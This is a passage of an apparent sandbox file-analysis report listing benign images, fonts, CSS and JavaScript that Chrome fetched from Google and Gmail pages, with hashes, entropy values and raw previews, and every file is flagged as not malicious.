                                                                                                                                                                                                                                                                                          SHA-512:65DA27D76B3440A581873F9A34962B67AEBD8C7F2FC0B448896C89A63B592EC7209778792BA82C1B3254D92E9FA167E830D8CC4173A1A228971911EAFC18E069
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?.o...$e..O.....m$)..A~fT.6.....?...Z.........1.`ps6.fL.Aq&MA.......)........f4..G........q.5.8...._..Dg.*r.}b.....MT..G..G..-{s......i...CD.'..U.WCZ..W...[.b....*...E..V.%o.9X\.].<)S.ES.Oj.......b..A.<2y.Z%....S....3...$.X|.j4LQ...)..Ab..l.....MRJ...9...lh..McT..j...._lZI...s......)..@.;}s.....-....J.E..~.P.{Q....P.%0.Wr}.4O..M..."C}...3...*.h......*Y.^...I..M........=.....b!.&..z9.,...Z..Dv.zze.l.[....j..J.j3._U.........__..<ELj......FR..'..w.v...."+..\......J?..|Q.=5IrLR...-;i...++..$y.<k..SJ..j...c......*er.*.M....$..-V.n...$L".4..1...$.......-.+.JJ..2...\Dj.....*...<.]...;L..)y..\..b.H8..V.."$.....Lr`T.FC...D..lG....u.+..].....n..<ej.+...$0.I...N..+[.U.0%LNZ.Tu.tO..$.I.U.T..rA&...A..Jt......;.vf.c..M... r.3.q.M..hw.E.5.....$9.`M.u:T.8...F.drL...E..x...Xz]..H1.........L.}.r..h.NiS/.Z..~Z.7N.;.._.....9._W......6_.*2.......?_......?\Z..".d..s....GO.?9....y...o~....0..).6....o....}.C..3.w~.....Z.../w.x.`.G...~...^8.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 287, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):374689
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.989828341431557
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:fYzAbkaJw7rCCTmYjs+KUXQhEiV3TaESRcKFKn1WMCHJNUfS1EGU/S0fD9uDGYBB:AzAbjQrCQjJmJaEKZUnILUK1P079uD9
                                                                                                                                                                                                                                                                                          MD5:9DFC177F59BCC8567988BDC302F05B7E
                                                                                                                                                                                                                                                                                          SHA1:F72128465036FDD6D119F1CFE6F37C9010F908E6
                                                                                                                                                                                                                                                                                          SHA-256:61F1CF23F1ADEE8CB6510AA0CFBFDE9E956985788F1BE71556C20CC806FEF2B3
                                                                                                                                                                                                                                                                                          SHA-512:E10FB7B41B1055C8C510BC2CB0C3A5C5678081DF1465D363A49154DD6689C2FA0DE9CF5C4F4FEED366FD8742F1556741EE92C78B4F0231CC15D7FEF5B99FB638
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/4Ae0zBYFQOJlGcRaDFUatVMPtUP7L-EcbwRa2p1o2tD5xISasgZmgKCgfIyMVYcsUPs5YHOUsDfy8T07EPP7mvL8h9NhmnVbRpOKq4v7jXLZ6yzVHN0q?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............7.~)....sBIT....|.d... .IDATx...w.d.q...W....j..x.`0..;. ....R...RGI.F...gW..V+...R..)-)Z...g0..t.....e..7...e.......P.z..eFFd./"22!..gF.._.7.....4zfg...1,M....g8....k...X...0.........I.....<....FK .A.+..Q...p3....\<.....:.r ..Z.` .V.....Xx......._[b. Y(........%..f....].s..UrBA....yD..>.Q........!.J.c^....f......Y.M.........AN.X..3B..F{.M.......!R.."..YRg.+._..f...Z..qx.0A.c,..Y....k....'Q.1...g.3.....?..d4vb...q#.%(......a.L..}.>..<p..Z......P)9....z.G|....(.}w..4......".......M..:.c..|...8~....+(..:..S.0.r.Z...m.b........Kt.......0.MZ.W...9L:...I>...Ka/.c..2kK+...+...../~......#....G.?..."W.~....".YEm.a...D..;:.........4z..G..q..uT..&3...}>..0.n.9p...c...$..Y.*....F.._......_eU.F.QP.P....KAA..$IBT. d.j.....Y.{...p..16Fwk....... .JB^.c../0s....Vd%.......I..).r.M6..............r....hU...[..y[.;]..mhK....j......F}].. .p...,#.A>..O?w.n....V.!....b4g.%..$.zS.@....2n......8..)|.(z.:&.L...........+.....}.....d...&>o+7.V8..o3|.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):597
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.055799613306871
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:SqaDcBgs6Q+LM8JgszLDgII3ilyBShKcSELM8JgI9JDgInLE98rOGexfAGeb:MHQ+6CQIChnq6I9+InBAu
                                                                                                                                                                                                                                                                                          MD5:9A6FB1BB67E1C16F7CE7C44E82C95DA2
                                                                                                                                                                                                                                                                                          SHA1:FE02712E7AE201643D3F227328E3AE551D67E9CA
                                                                                                                                                                                                                                                                                          SHA-256:527731AE0D0EF4EAC66BFC2A182B252B3CA65321D9CF2853B3B096B81B3483F5
                                                                                                                                                                                                                                                                                          SHA-512:6B9A1F7EA61B2BAC6214370419FA2009E5A5B73C953E53C37CB045D46FC3F94244FEC41E462F1DBBEC392F0294F24AB8B97A8E7D99CFF6570D710BFBA50038B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/gmail/about/static-2.0/css/partials/app-downloads.css?fingerprint=9a6fb1bb67e1c16f7ce7c44e82c95da2
                                                                                                                                                                                                                                                                                          Preview:@keyframes fade-in{0%{opacity:0}100%{opacity:1}}@keyframes fade-out{0%{opacity:1}100%{opacity:0}}.app-downloads{text-align:center}.app-downloads__container{padding:48px;background:#f8f9fa}@media(min-width: 1024px){.app-downloads__container{padding:60px}}.app-downloads__chapter__title{font-family:"Google Sans","Roboto",Arial,sans-serif;font-size:16px;font-weight:500;letter-spacing:.1px;line-height:24px;margin-bottom:24px}@media(min-width: 1024px){.app-downloads__chapter__title{font-size:20px}}.app-downloads__chapter__buttons{display:flex;gap:24px;justify-content:center;align-content:center}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):748
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.546618611973919
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/7ZoxbM6LLc8zy1bgtygfkg1WHfoOxqM1h9+0eQdI05Mjk02xYJspO:moxbMWc8YsWHwOxqMBnKg0dJspO
                                                                                                                                                                                                                                                                                          MD5:6639D32854A5B7CE2F031D30D5E9CFDB
                                                                                                                                                                                                                                                                                          SHA1:6B89647710FBA0D5B8E4EE7E091DA1CB15B6EF9E
                                                                                                                                                                                                                                                                                          SHA-256:92F411A933203556AAC2E0C03740C04EC302188BB04C5DF50C0785EEAA1302B4
                                                                                                                                                                                                                                                                                          SHA-512:B8F3C0756045D66D56271F6AF7FA3D91675C55A50D935E00FAC68CBC0EF4FBBCE7E39515FA49176F05407A86D33784C291BC328EB6672E2021FB0F1A93FA7022
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/G94jPzT8-VyXTJ2WRWLEIdGmSSwoaLvuGE5pIi8ay3YF3swg3ZcXhzEbhllbeb_nMoe-0gO3JVEZCa-SBGk_G2LpAKI__y98j3dhf50qyIRdC8xyqso=-h48-e365-rwu
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh...K.a..?3nY.%n[D]..M...CJ..^<u....t...cA.{J..7TzR.C..`Y"C..&K..).Z...2Y..3;.2.x.a..>......!!!!..j.. ..N..h.............R....e`...v....(.yK..nH.s`.x.t.7O#X.~..............)PM./..<k..k...`.3..4....OG/..WAV#...:..#.$.r...r.j..f...J.;....;t?.2.g.u.....U.]c.l...:,,...;.PLTv.__'&.P..iQy.b..u.Rtt..,d....[..Nc..H$`m......n.].3._..@....~...j.C.Dl.&'!...)I.1T.BO.h.R).d`xXB1...==.c.DDT...*..J.......O..:..I..80.v%U=......aeEZ}.......Y\..q?3.....YH.a`....................1...-.!....XZ...@..P..H.3.O.6...h.r|;o.$...@".b$..s....!...m.M`....d.l....'.T....&.V.G..7@.^.Y...W\.*}....F...@.............X.F.Q..b........}.....(r.}.XB.1..Y....[.bWBBBBB..?..:3.B......IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (444)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):445
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.557732422648013
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:A4qWuR/KERZt9vLqMaJmKb06HMQ/U/Mv9il5KBWFYYmtMpYvJYYGM6icZ7epFdra:A4HGHt9vLqzSWDDtDGhSHrb8vn
                                                                                                                                                                                                                                                                                          MD5:52A43C8021CA916FCCB733278DD838C3
                                                                                                                                                                                                                                                                                          SHA1:6F22E437E171F21685EFCFD886E315353605480D
                                                                                                                                                                                                                                                                                          SHA-256:CF70253B230F2C74CFFA13C36A58B859C641E1E1E2F4335E2D38F7473D5871DC
                                                                                                                                                                                                                                                                                          SHA-512:C5567C643DD0ECD7D3D7BCA24FA14FACBBA6F5E12B4B179CDE0207F3ED168555F57425588315ECAA945A6F25565A08BCB5C5C6974181725B214EF544BB3A6473
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:function c(n){return n}function u(n){return Object.is(n,-0)?0:n}function a(n,r,t){return Math.min(Math.max(t,n),r)}function l(n,r){return n===r?0:n<r?1:-1}function i(n){return a(0,1,u(n))}function f(n){return i(n)}function o(n,r,t){const e=f(t);return(1-e)*n+e*r}function s(n,r,t,e=c){return t=e(t),o(n,r,t)}function p(n,r,t,e=c){return s(n,r,t,e)}function d(n,r,t){const e=t-r;return r+((n-r)%e+e)%e}export{a as c,l as d,p as e,o as l,d as w};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 40764, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):40764
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.994672403049253
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:UxXq1Vs8xieZcUj5BKv+pAkSA08zfpcqJghgpoBJVwHPx:UxsGWjzKv/lifaqJghgpcVwHp
                                                                                                                                                                                                                                                                                          MD5:2ACAF14FC8F95882B9E5A61E5C6360A2
                                                                                                                                                                                                                                                                                          SHA1:EA92ECC7F902BB7A29BCE976A62EE4C323EAFA7A
                                                                                                                                                                                                                                                                                          SHA-256:F360E3EAFE41818C7CAA5A15206919657109E8F8DCB6BE2433102912349743DE
                                                                                                                                                                                                                                                                                          SHA-512:3C2827E8F3109DE4D9E72047033D07270C3164091F554AEA435342F7C7B410CF95230B92F63D922B3E65FE334B12292AB74645858DD8BE50D225B0C2051F885F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPikUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2.......<......................................%..0...?HVAR...`?STAT..'..../<.....D.......0..X.6.$.... ..B.....[%.q..9...f...x.R...1...........i`...0..........m....b.(.&.j.)jh..j......jK../9h.;..i<......l.7LdJx.`M.pB.m.UL8>I/.........5.*[4...W./...+~x..).6...RV ...\f......!H'..v.Z<.e...z...l./.>......P...7Z|`.v....ox.D.........7.G|n....\..B..!b..B.! ..x!^.H.RD...)F.|....r.H..Q.h.*".Y.....E).....-.H1"...d...if..>...u. ..x..;@.].?....o....E\#....H2.?..4z.h....H.M..-....1......q.}........~Y........ .b.i..ia` V..<}.....%....X.S...|.v.....,.j.?.]Q.!.wE3.....w....2.MT....6..kf...v... ;.&}.G,lgo.D..\....'=B.GsZ@Tr......{..'..u..5..?..S....W...U. .6.hv.....0... ..[...J.6.&.,$.6y..'V...9..v..M.r.......!..e1.+......9..+<k......>.p.......l.2.|ED.......*.6W.$'EU..V.rn.$....O..........Ky..0.(.,....lr_m~]/...l...UBW.._`..v.<..&.WB..`.....u...m0.J.....m..\..v...H..$.~*..J6.J..R..t....$.(...4...[J..*LY~..9..o[.q.3...i..t.q.{<.}O........Y............M......x
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5188
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952928145135762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:9JKglioE6pMcO5oiXZuh+u/U7pLnZ0jnn7dwp5KRf0271XM8zAJPzSjCWdJ28/p2:9J66pTOlI+u/U7pLnZ0jn7dwuRfU8zAd
                                                                                                                                                                                                                                                                                          MD5:714ACF1F5A07C6204BBD7E59194A2870
                                                                                                                                                                                                                                                                                          SHA1:3F8170F84AA88CC81D56C4383CF3758E7945D71F
                                                                                                                                                                                                                                                                                          SHA-256:1C58D90328C77231DAAA4F46073F3BADE862DB0E24A896F1B17912BB52C0FDDA
                                                                                                                                                                                                                                                                                          SHA-512:FE1D52B327E09B1936B156546DF09F10802ED8D51C474217F4E02FFB8C312F519540136833C5E51A07CC7E25A748F2DECAC7D393885BF4AF05A53CB9C52465B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/SP5F8XlkxjIfM3uEu47BolKEBwkqWrOfyvwywHut48p0AZgedzyhcoevSaJCEBUJNXvy7dplTwI3s6dizxE1lNXFa-RkpU9nkIAmnSU=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y.T..?..^Uuu7.44;..K..n.Mp.4..Fe.......dr.1.....%.q"q..h......3!.9..M7.`\..l..&.MwUW...?Z<4T5U.....>.p..{..~.}........(P O.\;.)v\.....KP..)....Z.b........b-b<..W$f ..A$b.r....~.L.e...2.;b{[..#eFt0*.A...P...2T.#...U-..E...h=p@.N............/.}.+.....v..%.GS..2.....*.A.lE.B....Q.Aw!...g..5...[CM...k6x.6..y/...'.....a.@......m..ETv"l.j.....}W.~.]O.#/..u.XW\g..~.1.LPaX~9....V.Z./...U..\{u4y...~..X<../.0.t.H(.~..*V.7....U...6......WH]... .-P..$O|K......{z.s..z.......&L..7..$..\..!v...*...^.J....._<..9...3....\.....DY.h2..\[..b;'..]8.r.s?.A@ .>d....S...U...6.U.w.3,....Q.3.(..<.....+k.).F.&..*.3...0"[6...5.fz....d.\V...s.c^.d..@8W..z....c.G.|~\YK...9o......c&r.....~....:...{..%y...O.O....}..~.p3.`dLo9.g..U.F... 8.^.gj._.a"...}e..ll:....h...m.....q.g.2.d*..I.K.5.p. ...m...e!...|E..~..X+.@.....>[..8(.>.wy.A?MeD.=S...N....A...k.-_^].N.....eq.PsIA..X.....|yuC6Lv....X.HA...|..._...P..vJ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 8152, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8152
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.967461502394633
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:/uNKiCTLzxGi+zuEGftZxtzRRgC7xSwH1RLhIZEwIRjRPSUNPeS:/uNKhwhSEKRgiYwHpwIRFKAj
                                                                                                                                                                                                                                                                                          MD5:2A3C2B114A2C0B253E1FBEDE3B033BBF
                                                                                                                                                                                                                                                                                          SHA1:6B993DF9C38C2CED074A2921D79AA2332D489FB9
                                                                                                                                                                                                                                                                                          SHA-256:4E0F8007CB62EB2763CC692D5F2FD1DE06CDE0D8AF8BF1C955D4EBECAC266E90
                                                                                                                                                                                                                                                                                          SHA-512:15BFC5104717B0E37CB764CA69AF1C2DA40E22D8C78FDB1901E30709EBC36058963CB272798480F4AC63B9BADA4D755DA538ED12D86B9842D4953E36D8BE135E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPj0UvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............Od...h..........................R..>...?HVAR.{.`?STAT..'..../<......e..D.0.0.6.$.... ..B..U...)I%c[F...$..4.......F..T)..e..Y..-'..N....+l.!t.&RB....).3h8e2r....8.8..$E#.......[$g9..H..#.p.K..W...G.h.^.=*.!..<?g.k.{..MB. ....D'x..A../..k;P...Z:R..)..I...a.O..<..K.$..i....#2n.M.I.....K.S.{.R:g.2....pC.G$.]..j...+..G......s......_..X..Y..r...Z...,..3....l.^..g/...Va.R4)...*e.6-..48/..2..K:.rO.P.[.uZ..R1.\ri x......{w.`..........u.b.u....=.m.v@...zej.N..i._.Y.{...y. ...G....X./g..,.K.(AZ..t.YH..9..3{..2..2.,d..l.C...D....SA.!.K..R..f..`&Rk7...{b.B...Z........x....p..@.....K..$.Q."q...L$[)R...P.4Z.,.t[.l..g.....j.....0.o..............~.-2..U......|..........!........{.?~.... ..q!+.w\V..N.t..O.u.9....3B.v...Eg....d........AG...Z...Tv.]f.F#k..).@..Y/..7.U..p:...h:.-....."/.-._.+..R7.......W....H/......!b..q...&#.A}:.ca.O'.F...l..>.s#+........./ep......7.z...{.......I......n..MWv_L.'.........9..>.7 ..{.....6...B.41...w..d.=HEXE.._..q....A
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2002
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.785694192036961
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:OrVGY7zdSfpppppgfCtYFgewzB0iRcnpppppy1ssvn/62a+DRgHdBxfxnBt3q3UR:GGY7ztCtYFgegBhcNsHf92pxDp0wAG8o
                                                                                                                                                                                                                                                                                          MD5:277569215A9A6E7C6B7553892F210CCB
                                                                                                                                                                                                                                                                                          SHA1:7A483FE9E0A54E1ADD9BA3684F1DE7CB92BB031A
                                                                                                                                                                                                                                                                                          SHA-256:4F65200DF0A0F28A9427FA0CCC75D604422BA6DC2487437032D068576058955F
                                                                                                                                                                                                                                                                                          SHA-512:5A6436A4EEBAC0D5CE458843EEAB33F24A5A5F194F4477A6BABA28FC15803DF79A43A07134D37D2276827137E99D3C0628B2474F874F0457A864E54C6B4D8167
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/oLcLMz42MUjK9Iv4M4YSOfBIHcxUh9dck3PN8kT8FR_z9_mUlWzyf4JHqPavPsKHJ7FR2rlGZf51vgEv1k5i0QQai4_J0ffYkIFbaJA=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx...k..U.....EJki..0......bD#D%..4......X$.Z...T...c.....c"..`@CPATP.p..j ...B..^..EJ.p.x.....L......syv.{...sH$..D".#.....j...`.,.yO..ql..mh..$.#...q"^..p4.c..n(q/n.........H.;`8p..w..n.qM.o.}'.-3.. >..L....^...TN.[d8p...S6u....]R.b....3Q`QCMn.Gz}W..[C.'.1.x#>.9..Y....u*%..3.X*.=....yu*$...^....O...Z.p.. ...v,m......Ip....:.....U.&..r".....*.........9.\...L..c..OhTe/.R.`....0....Y.P.<.T.0%....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....G..;:.6)s{....?.6z|.7....].f...8.$J.#.G.t...S.U.....\Z.~....S.....M.en. ..!a..../...aT.*s/o/.n.f..9../...6....+....SVx...w.1....5......vR!uJ....2..;.l....[..:3/x..z'>.B....e>.....>..8..'.n..G}.$3-...x.........o...,...h....A..0..U1!.,-.Vg..Y.....vY9........8....Z..,..S.4dS....c.....s...m.....e...$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.$....GN..9Ip.e........{..w..Y.\3K4&x.s.UB.....a..1G.$W..7..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2287)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):222005
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.525934675920663
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:DJ+6L9F/dcVoIqz3mnxXEzmnBBBpELq/N6p/kn6Z4vBk7SzCCdwDGslfjiCCc+Dp:9+6L9F/dYoIqz38xXJnBBBpELq/N6p/q
                                                                                                                                                                                                                                                                                          MD5:6871D302C8E74C81AD6046E03E5BEA11
                                                                                                                                                                                                                                                                                          SHA1:F20159BE94B5BFCFBC5C7679F361399F42328D29
                                                                                                                                                                                                                                                                                          SHA-256:11456E3D960B97AF5ED7736ADE63019B6BECFC2491A5661171C3E53D2712DE75
                                                                                                                                                                                                                                                                                          SHA-512:5A4EFF929DA69710F5EDA33CC2DB3C0677166A3B4AE7947909BEFAC8FED39EB33E4381814688DD0893CB44F28FF429E9711D7EB1DE0A2C3759EF36961764232A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.RRlsmNlDmQQ.2019.O/rt=j/m=qabr,q_d,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/rs=AA2YrTv3Qzh6Ja6eSLzWU_FOQIMZM5uKUQ"
                                                                                                                                                                                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{.var Le;Le=0;_.Me=function(a){return Object.prototype.hasOwnProperty.call(a,_.Qb)&&a[_.Qb]||(a[_.Qb]=++Le)};_.Ne=function(a){return _.Pb(a)&&a.nodeType==1};_.Oe=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.Ie(a),a.appendChild(_.xe(a).createTextNode(String(b)))};var Pe;_.Qe=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;c===""||c==void 0?(Pe||(Pe={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=Pe,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var Ue;_.Te=function(a,b,c,d,e,f){if(_.uc&&e)return _.Re(a);if(e&&!d)re
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):782
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.663075082819543
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/7tV2Ngbl5OtgJxlh1AARmuS+iBNjfOLvPbv//RZrskIZzYwCM+AqalZ0nQ6Sh:EV2CxlrZivkvPz/JiDZzYwCM+SODi
                                                                                                                                                                                                                                                                                          MD5:FF6089EAA756E4DC83A95C998F63BCFD
                                                                                                                                                                                                                                                                                          SHA1:8ECF67F4ABE4C3A6E8304D01DD75B055738A0FB7
                                                                                                                                                                                                                                                                                          SHA-256:B570AA59F2B1087731630AB10FF7F172DA3A3D079379149EBF6DB00E99A53FC6
                                                                                                                                                                                                                                                                                          SHA-512:2B97E86D1A57711029F8ED715FAACD44A37F206CD3DE8A3D71D49F2781CBBF499957BF7CE51238509DF5F289E55F724E88ECFCB67BBA31DA83811989020CD5E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/vgV0ZY79GX76MlYG-ilRrNezWnKARNNncXKa7KRN1-A3Gbvqr7dB5XAaf6srYx5NEI5OvgFuIL13GlErzOelQUnUO7g1m_8mMGaa6Xl6lLseEjXdzEhy=-h48-e365-rwu
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh..=h.A...c4.."B....6. .E.h@0*\...RE...b${..........F,7....U. .Q.?.`4.......H."W...w..]....y....oog.F`.|..@. ..B...bD.Z.|..`.h.uJ.A.b.d8...w9..@.. p}..Q.F.....S..[...U.F.U.2..+..n..P...2.....w..h..L:.i@.......t.@.+.2]..H..JK.6....n...Y.....;G;.|.:...t..|.u..c.^G..e.....".a..B03;..,R.......5....i.l..qM.C.ghI;y.@.(=q..Z.M3?..$..b.....K..3.V.5.2]9...LW.d...&..3#..@...;V...0.l...n|.......2G%..zVAx6_.K.`.4..3K^.-..n.R.uI^...FJ...PR...l......6....L! ..t.k':..4&.D..k\j..+...3...).)..W..;........H..0....]eT....h..J7...<`z.#.c.1.d9...QH..R.....xm\..=....=j..OcL...\.hUyD..Y.#Ac..K.@...J.G..v%..0..".}....Q.-......q...[(..A?....I_k9.4...x.. ...2......M..#,_.."...y.y.x....../.e&.....}..,......IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2129
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.885572035830442
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:mpSrqBAnO+ZvuhgRvqpasQGPM3aS6hRlGmVZJJvBpqHiAQTjLfKn0WEb3/NrOaHq:mQOoslawtVRvBpqHzQuSNaaIRrE6
                                                                                                                                                                                                                                                                                          MD5:768AA3466121F4E2000E9D2E9049F3CA
                                                                                                                                                                                                                                                                                          SHA1:8CF935957C99B733027B540BAADCEA0ADADE515E
                                                                                                                                                                                                                                                                                          SHA-256:C957815473F87DEF27FD89A83B1250CAAEED629C6E745A6A99F13B36ED68C1D0
                                                                                                                                                                                                                                                                                          SHA-512:1634664926C44009616F643779E185CEC17708C17651CAF35E62919F4DF42D6C0F5EDD44E30FA67C077E7F4FFB8E15B431F8456E8B41E29F9EE1557A87C604A5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/66PxAD8XJR8BGD_OjZnKQKZu0xEVnHfPmso4XbKjMOqQORhSyZaEqsGVW0qwMbX5eJ58pY5CwbsY02RLksHDsec-h4M-UcShUtZO0HLJ9FB1Qt0RhA=-h48-e365-rwu
